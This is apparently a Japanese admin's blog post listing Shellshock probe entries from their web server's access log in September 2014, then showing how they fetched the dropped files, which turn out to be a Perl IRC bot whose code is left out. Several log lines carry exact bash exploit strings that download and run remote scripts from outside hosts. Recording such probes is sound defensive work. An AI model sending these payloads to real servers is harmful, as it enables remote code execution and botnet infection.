scan履歴

internetsurvey-3.erratasec.com - - [25/Sep/2014:04:33:35 +0900] "GET / HTTP/1.0" 200 156 "() { :; }; ping -c 11 216.75.60.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
internetsurvey-3.erratasec.com - - [25/Sep/2014:11:19:59 +0900] "GET / HTTP/1.0" 200 156 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
hosted-by.snel.com - - [25/Sep/2014:14:59:52 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 994 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
118.192.48.6 - - [28/Sep/2014:00:48:23 +0900] "GET /cgi-bin/count.cgi HTTP/1.1" 404 1128 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo **********`;"
118.192.48.6 - - [28/Sep/2014:00:48:23 +0900] "GET /cgi-bin/test.cgi HTTP/1.1" 404 1128 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo **********`;"
118.192.48.6 - - [28/Sep/2014:00:48:24 +0900] "GET /cgi-bin/help.cgi HTTP/1.1" 404 1128 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo ************"
118.192.48.6 - - [28/Sep/2014:00:48:24 +0900] "GET /cgi-bin/index.cgi HTTP/1.1" 404 1128 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo **********`;"
rottweiler.net7.be - - [28/Sep/2014:14:15:03 +0900] "GET / HTTP/1.0" 200 145 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\""
60.18.147.183 - - [28/Sep/2014:17:34:22 +0900] "GET / HTTP/1.0" 200 125 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\""
12.64.2d.static.xlhost.com - - [29/Sep/2014:01:53:09 +0900] "GET /cgi-bin/hi HTTP/1.0" 404 1003 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
ec2-54-251-83-67.ap-southeast-1.compute.amazonaws.com - - [29/Sep/2014:22:28:19 +0900] "GET / HTTP/1.1" 200 177 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
web21.qna.vengit.com - - [30/Sep/2014:10:43:15 +0900] "GET /cgi-bin/hi HTTP/1.0" 404 1003 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/ji ; perl /tmp/ji;rm -rf /tmp/ji\""

仕込まれそうになったファイルを確認

[root@localhost tmp]# wget -O regular.bot "http://stablehost.us/bots/regular.bot"
--12:44:08--  http://stablehost.us/bots/regular.bot
           => `regular.bot'
stablehost.us をDNSに問いあわせています... 失敗しました: ホストが見つかりません.
[root@localhost tmp]# wget -O ji "http://213.5.67.223/ji"
--12:44:47--  http://213.5.67.223/ji
           => `ji'
213.5.67.223:80 に接続しています... 接続しました。
HTTP による接続要求を送信しました、応答を待っています... 200 OK
長さ: 16,680 [text/plain]

100%[=============================================================>] 16,680        59.47K/s             

12:44:48 (59.41 KB/s) - `ji' を保存しました [16680/16680]

[root@localhost tmp]# wget -O jurat "http://213.5.67.223/jurat"
--12:45:01--  http://213.5.67.223/jurat
           => `jurat'
213.5.67.223:80 に接続しています... 接続しました。
HTTP による接続要求を送信しました、応答を待っています... 404 Not Found
12:45:02 エラー 404: Not Found。
[root@localhost tmp]# dig -x 213.5.67.223 +short
hosted-by.as51430.net.

ji

#!/usr/bin/perl
# ------------------------------------------------------------- #
#                       LinuxNet perlbot                        #
# ------------------------------------------------------------- #

以下略

参考